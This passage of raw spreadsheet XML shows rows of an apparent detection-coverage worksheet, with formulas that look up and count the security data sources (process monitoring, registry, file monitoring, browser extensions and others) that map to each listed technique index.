        <v>6</v>
      </c>
      <c r="E135" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F135" s="53"/>
      <c r="G135" s="19"/>
    </row>
    <row r="136" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A136" s="16" t="s">
        <v>245</v>
      </c>
      <c r="B136" s="53" t="str">
        <f>LOOKUP(A136,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Network protocol analysis,Process use of network</v>
      </c>
      <c r="C136" s="17" t="s">
        <v>213</v>
      </c>
      <c r="D136" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E136" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F136" s="53"/>
      <c r="G136" s="19"/>
    </row>
    <row r="137" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A137" s="16" t="s">
        <v>246</v>
      </c>
      <c r="B137" s="53" t="str">
        <f>LOOKUP(A137,'REF-DataSources'!A:C)</f>
        <v>Office 365 account logs,Azure activity logs,AWS CloudTrail logs,Process monitoring,Process command-line parameters,Authentication logs,Windows event logs</v>
      </c>
      <c r="C137" s="17" t="s">
        <v>247</v>
      </c>
      <c r="D137" s="53">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E137" s="53">
        <f t="shared" si="4"/>
        <v>4</v>
      </c>
      <c r="F137" s="53"/>
      <c r="G137" s="19"/>
    </row>
    <row r="138" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A138" s="16" t="s">
        <v>248</v>
      </c>
      <c r="B138" s="53" t="str">
        <f>LOOKUP(A138,'REF-DataSources'!A:C)</f>
        <v>Mail server,Process monitoring,Process command-line parameters,Windows Registry,File monitoring</v>
      </c>
      <c r="C138" s="17" t="s">
        <v>114</v>
      </c>
      <c r="D138" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E138" s="53">
        <f t="shared" ref="E138:E201" si="6">LEN(TRIM(C138))-LEN(SUBSTITUTE(TRIM(C138),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F138" s="53"/>
      <c r="G138" s="19"/>
    </row>
    <row r="139" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A139" s="16" t="s">
        <v>249</v>
      </c>
      <c r="B139" s="53" t="str">
        <f>LOOKUP(A139,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Windows Registry,Process monitoring</v>
      </c>
      <c r="C139" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D139" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E139" s="53">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F139" s="53"/>
      <c r="G139" s="19"/>
    </row>
    <row r="140" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A140" s="16" t="s">
        <v>250</v>
      </c>
      <c r="B140" s="53" t="str">
        <f>LOOKUP(A140,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Windows Registry,Process monitoring</v>
      </c>
      <c r="C140" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D140" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E140" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F140" s="53"/>
      <c r="G140" s="19"/>
    </row>
    <row r="141" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A141" s="16" t="s">
        <v>251</v>
      </c>
      <c r="B141" s="53" t="str">
        <f>LOOKUP(A141,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C141" s="17" t="s">
        <v>252</v>
      </c>
      <c r="D141" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E141" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F141" s="53"/>
      <c r="G141" s="19"/>
    </row>
    <row r="142" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A142" s="16" t="s">
        <v>253</v>
      </c>
      <c r="B142" s="53" t="str">
        <f>LOOKUP(A142,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C142" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D142" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E142" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F142" s="53"/>
      <c r="G142" s="19"/>
    </row>
    <row r="143" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A143" s="16" t="s">
        <v>254</v>
      </c>
      <c r="B143" s="53" t="str">
        <f>LOOKUP(A143,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C143" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D143" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E143" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F143" s="53"/>
      <c r="G143" s="19"/>
    </row>
    <row r="144" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A144" s="16" t="s">
        <v>255</v>
      </c>
      <c r="B144" s="53" t="str">
        <f>LOOKUP(A144,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C144" s="17">
        <v>100</v>
      </c>
      <c r="D144" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E144" s="53">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F144" s="53"/>
      <c r="G144" s="19"/>
    </row>
    <row r="145" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A145" s="16" t="s">
        <v>256</v>
      </c>
      <c r="B145" s="53" t="str">
        <f>LOOKUP(A145,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C145" s="17">
        <v>0</v>
      </c>
      <c r="D145" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E145" s="53">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F145" s="53"/>
      <c r="G145" s="19"/>
    </row>
    <row r="146" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A146" s="16" t="s">
        <v>257</v>
      </c>
      <c r="B146" s="53" t="str">
        <f>LOOKUP(A146,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C146" s="17">
        <v>100</v>
      </c>
      <c r="D146" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E146" s="53">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F146" s="53"/>
      <c r="G146" s="19"/>
    </row>
    <row r="147" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A147" s="16" t="s">
        <v>258</v>
      </c>
      <c r="B147" s="53" t="str">
        <f>LOOKUP(A147,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C147" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D147" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E147" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F147" s="53"/>
      <c r="G147" s="19"/>
    </row>
    <row r="148" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A148" s="16" t="s">
        <v>260</v>
      </c>
      <c r="B148" s="53" t="str">
        <f>LOOKUP(A148,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C148" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D148" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E148" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F148" s="53"/>
      <c r="G148" s="19"/>
    </row>
    <row r="149" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A149" s="16" t="s">
        <v>261</v>
      </c>
      <c r="B149" s="53" t="str">
        <f>LOOKUP(A149,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C149" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D149" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E149" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F149" s="53"/>
      <c r="G149" s="19"/>
    </row>
    <row r="150" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A150" s="16" t="s">
        <v>262</v>
      </c>
      <c r="B150" s="53" t="str">
        <f>LOOKUP(A150,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C150" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D150" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E150" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F150" s="53"/>
      <c r="G150" s="19"/>
    </row>
    <row r="151" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A151" s="16" t="s">
        <v>263</v>
      </c>
      <c r="B151" s="53" t="str">
        <f>LOOKUP(A151,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C151" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D151" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E151" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F151" s="53"/>
      <c r="G151" s="19"/>
    </row>
    <row r="152" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A152" s="16" t="s">
        <v>264</v>
      </c>
      <c r="B152" s="53" t="str">
        <f>LOOKUP(A152,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C152" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D152" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E152" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F152" s="53"/>
      <c r="G152" s="19"/>
    </row>
    <row r="153" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A153" s="16" t="s">
        <v>265</v>
      </c>
      <c r="B153" s="53" t="str">
        <f>LOOKUP(A153,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C153" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D153" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E153" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F153" s="53"/>
      <c r="G153" s="19"/>
    </row>
    <row r="154" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A154" s="16" t="s">
        <v>266</v>
      </c>
      <c r="B154" s="53" t="str">
        <f>LOOKUP(A154,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C154" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D154" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E154" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F154" s="53"/>
      <c r="G154" s="19"/>
    </row>
    <row r="155" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A155" s="16" t="s">
        <v>267</v>
      </c>
      <c r="B155" s="53" t="str">
        <f>LOOKUP(A155,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C155" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D155" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E155" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F155" s="53"/>
      <c r="G155" s="19"/>
    </row>
    <row r="156" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A156" s="16" t="s">
        <v>268</v>
      </c>
      <c r="B156" s="53" t="str">
        <f>LOOKUP(A156,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C156" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D156" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E156" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F156" s="53"/>
      <c r="G156" s="19"/>
    </row>
    <row r="157" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A157" s="16" t="s">
        <v>269</v>
      </c>
      <c r="B157" s="53" t="str">
        <f>LOOKUP(A157,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C157" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D157" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E157" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F157" s="53"/>
      <c r="G157" s="19"/>
    </row>
    <row r="158" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A158" s="16" t="s">
        <v>270</v>
      </c>
      <c r="B158" s="53" t="str">
        <f>LOOKUP(A158,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C158" s="17">
        <v>100</v>
      </c>
      <c r="D158" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E158" s="53">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F158" s="53"/>
      <c r="G158" s="19"/>
    </row>
    <row r="159" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A159" s="16" t="s">
        <v>271</v>
      </c>
      <c r="B159" s="53" t="str">
        <f>LOOKUP(A159,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C159" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D159" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E159" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F159" s="53"/>
      <c r="G159" s="19"/>
    </row>
    <row r="160" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A160" s="16" t="s">
        <v>272</v>
      </c>
      <c r="B160" s="53" t="str">
        <f>LOOKUP(A160,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C160" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D160" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E160" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F160" s="53"/>
      <c r="G160" s="19"/>
    </row>
    <row r="161" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A161" s="16" t="s">
        <v>273</v>
      </c>
      <c r="B161" s="53" t="str">
        <f>LOOKUP(A161,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C161" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D161" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E161" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F161" s="53"/>
      <c r="G161" s="19"/>
    </row>
    <row r="162" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A162" s="16" t="s">
        <v>274</v>
      </c>
      <c r="B162" s="53" t="str">
        <f>LOOKUP(A162,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C162" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D162" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E162" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F162" s="53"/>
      <c r="G162" s="19"/>
    </row>
    <row r="163" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A163" s="16" t="s">
        <v>275</v>
      </c>
      <c r="B163" s="53" t="str">
        <f>LOOKUP(A163,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C163" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D163" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E163" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F163" s="53"/>
      <c r="G163" s="19"/>
    </row>
    <row r="164" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A164" s="16" t="s">
        <v>276</v>
      </c>
      <c r="B164" s="53" t="str">
        <f>LOOKUP(A164,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C164" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D164" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E164" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F164" s="53"/>
      <c r="G164" s="19"/>
    </row>
    <row r="165" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A165" s="16" t="s">
        <v>277</v>
      </c>
      <c r="B165" s="53" t="str">
        <f>LOOKUP(A165,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C165" s="17">
        <v>0</v>
      </c>
      <c r="D165" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E165" s="53">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F165" s="53"/>
      <c r="G165" s="19"/>
    </row>
    <row r="166" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A166" s="16" t="s">
        <v>278</v>
      </c>
      <c r="B166" s="53" t="str">
        <f>LOOKUP(A166,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C166" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D166" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E166" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F166" s="53"/>
      <c r="G166" s="19"/>
    </row>
    <row r="167" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A167" s="16" t="s">
        <v>279</v>
      </c>
      <c r="B167" s="53" t="str">
        <f>LOOKUP(A167,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C167" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D167" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E167" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F167" s="53"/>
      <c r="G167" s="19"/>
    </row>
    <row r="168" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A168" s="16" t="s">
        <v>280</v>
      </c>
      <c r="B168" s="53" t="str">
        <f>LOOKUP(A168,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C168" s="17">
        <v>100</v>
      </c>
      <c r="D168" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E168" s="53">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F168" s="53"/>
      <c r="G168" s="19"/>
    </row>
    <row r="169" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A169" s="16" t="s">
        <v>281</v>
      </c>
      <c r="B169" s="53" t="str">
        <f>LOOKUP(A169,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C169" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D169" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E169" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F169" s="53"/>
      <c r="G169" s="19"/>
    </row>
    <row r="170" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A170" s="16" t="s">
        <v>282</v>
      </c>
      <c r="B170" s="53" t="str">
        <f>LOOKUP(A170,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C170" s="17">
        <v>100</v>
      </c>
      <c r="D170" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E170" s="53">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F170" s="53"/>
      <c r="G170" s="19"/>
    </row>
    <row r="171" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A171" s="16" t="s">
        <v>283</v>
      </c>
      <c r="B171" s="53" t="str">
        <f>LOOKUP(A171,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C171" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D171" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E171" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F171" s="53"/>
      <c r="G171" s="19"/>
    </row>
    <row r="172" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A172" s="16" t="s">
        <v>284</v>
      </c>
      <c r="B172" s="53" t="str">
        <f>LOOKUP(A172,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C172" s="17" t="s">
        <v>252</v>
      </c>
      <c r="D172" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E172" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F172" s="53"/>
      <c r="G172" s="19"/>
    </row>
    <row r="173" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A173" s="16" t="s">
        <v>285</v>
      </c>
      <c r="B173" s="53" t="str">
        <f>LOOKUP(A173,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C173" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D173" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E173" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F173" s="53"/>
      <c r="G173" s="19"/>
    </row>
    <row r="174" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A174" s="16" t="s">
        <v>286</v>
      </c>
      <c r="B174" s="53" t="str">
        <f>LOOKUP(A174,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C174" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D174" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E174" s="53">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F174" s="53"/>
      <c r="G174" s="19"/>
    </row>
    <row r="175" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A175" s="16" t="s">
        <v>287</v>
      </c>
      <c r="B175" s="53" t="str">
        <f>LOOKUP(A175,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C175" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D175" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E175" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F175" s="53"/>
      <c r="G175" s="19"/>
    </row>
    <row r="176" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A176" s="16" t="s">
        <v>288</v>
      </c>
      <c r="B176" s="53" t="str">
        <f>LOOKUP(A176,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Authentication logs,DLL monitoring,Packet capture,Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="C176" s="17" t="s">
        <v>289</v>
      </c>
      <c r="D176" s="53">
        <f t="shared" si="5"/>
        <v>8</v>
      </c>
      <c r="E176" s="53">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F176" s="53"/>
      <c r="G176" s="19"/>
    </row>
    <row r="177" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A177" s="16" t="s">
        <v>290</v>
      </c>
      <c r="B177" s="53" t="str">
        <f>LOOKUP(A177,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C177" s="17" t="s">
        <v>291</v>
      </c>
      <c r="D177" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E177" s="53">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F177" s="53"/>
      <c r="G177" s="19"/>
    </row>
    <row r="178" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A178" s="16" t="s">
        <v>292</v>
      </c>
      <c r="B178" s="53" t="str">
        <f>LOOKUP(A178,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C178" s="17" t="s">
        <v>293</v>
      </c>
      <c r="D178" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E178" s="53">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F178" s="53"/>
      <c r="G178" s="19"/>
    </row>
    <row r="179" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A179" s="16" t="s">
        <v>294</v>
      </c>
      <c r="B179" s="53" t="str">
        <f>LOOKUP(A179,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C179" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D179" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E179" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F179" s="53"/>
      <c r="G179" s="19"/>
    </row>
    <row r="180" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A180" s="16" t="s">
        <v>295</v>
      </c>
      <c r="B180" s="53" t="str">
        <f>LOOKUP(A180,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C180" s="17" t="s">
        <v>296</v>
      </c>
      <c r="D180" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E180" s="53">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F180" s="53"/>
      <c r="G180" s="19"/>
    </row>
    <row r="181" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A181" s="16" t="s">
        <v>297</v>
      </c>
      <c r="B181" s="53" t="str">
        <f>LOOKUP(A181,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C181" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D181" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E181" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F181" s="53"/>
      <c r="G181" s="19"/>
    </row>
    <row r="182" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A182" s="16" t="s">
        <v>298</v>
      </c>
      <c r="B182" s="53" t="str">
        <f>LOOKUP(A182,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C182" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D182" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E182" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F182" s="53"/>
      <c r="G182" s="19"/>
    </row>
    <row r="183" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A183" s="16" t="s">
        <v>299</v>
      </c>
      <c r="B183" s="53" t="str">
        <f>LOOKUP(A183,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C183" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D183" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E183" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F183" s="53"/>
      <c r="G183" s="19"/>
    </row>
    <row r="184" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A184" s="16" t="s">
        <v>300</v>
      </c>
      <c r="B184" s="53" t="str">
        <f>LOOKUP(A184,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C184" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D184" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E184" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F184" s="53"/>
      <c r="G184" s="19"/>
    </row>
    <row r="185" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A185" s="16" t="s">
        <v>301</v>
      </c>
      <c r="B185" s="53" t="str">
        <f>LOOKUP(A185,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C185" s="17">
        <v>100</v>
      </c>
      <c r="D185" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E185" s="53">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
